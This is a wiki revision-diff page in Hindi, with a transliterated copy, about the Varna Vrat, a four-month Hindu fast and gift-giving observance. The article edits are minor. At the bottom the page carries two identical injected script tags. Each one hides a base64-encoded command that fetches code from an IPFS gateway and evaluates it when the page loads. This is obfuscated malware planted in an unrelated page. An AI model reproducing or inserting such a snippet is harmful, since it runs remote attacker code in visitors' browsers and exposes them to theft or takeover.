Difference between revisions of "वर्ण व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (वर्णव्रत का नाम बदलकर वर्ण व्रत कर दिया गया है)
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह चतुमूर्ति व्रत है, जो [[चैत्र]] [[शुक्ल पक्ष]] से चार [[मास|मासों]] तक चलता है।
 
*यह चतुमूर्ति व्रत है, जो [[चैत्र]] [[शुक्ल पक्ष]] से चार [[मास|मासों]] तक चलता है।
 
*[[चैत्र]], [[वैसाख]], [[ज्येष्ठ]] एवं [[आषाढ़]] में कर्ता उपवास करता है और क्रम से [[वासुदेव]], [[संकर्षण]], [[प्रद्युम्न]] की पूजा करता है तथा दान देता है।
 
*[[चैत्र]], [[वैसाख]], [[ज्येष्ठ]] एवं [[आषाढ़]] में कर्ता उपवास करता है और क्रम से [[वासुदेव]], [[संकर्षण]], [[प्रद्युम्न]] की पूजा करता है तथा दान देता है।
*दान की वस्तुओं में कई प्रकार पाये जाते हैं, यथा- ब्राह्मण को यज्ञ की उपयोगी वस्तुएँ, क्षत्रिय को युद्धोपयोगी, वैश्य को वाणिज्योपयोगी तथा शूद्र को श्रमोपयोगी वस्तुएँ दी जाती हैं, कर्ता को इन्द्रलोक प्राप्त होता है। <ref>हेमाद्रि (व्रतखण्ड 2, 828, विष्णुधर्मोत्तरपुराण से उद्धरण)।</ref>
+
*दान की वस्तुओं में कई प्रकार पाये जाते हैं, यथा- ब्राह्मण को यज्ञ की उपयोगी वस्तुएँ, क्षत्रिय को युद्धोपयोगी, वैश्य को वाणिज्योपयोगी तथा शूद्र को श्रमोपयोगी वस्तुएँ दी जाती हैं, कर्ता को इन्द्रलोक प्राप्त होता है।<ref>हेमाद्रि (व्रतखण्ड 2, 828, विष्णुधर्मोत्तरपुराण से उद्धरण)।</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 10:39, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah chatumoorti vrat hai, jo chaitr shukl paksh se char masoan tak chalata hai.
  • chaitr, vaisakh, jyeshth evan ashadh mean karta upavas karata hai aur kram se vasudev, sankarshan, pradyumn ki pooja karata hai tatha dan deta hai.
  • dan ki vastuoan mean kee prakar paye jate haian, yatha- brahman ko yajn ki upayogi vastuean, kshatriy ko yuddhopayogi, vaishy ko vanijyopayogi tatha shoodr ko shramopayogi vastuean di jati haian, karta ko indralok prapt hota hai.[1]


tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 828, vishnudharmottarapuran se uddharan).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>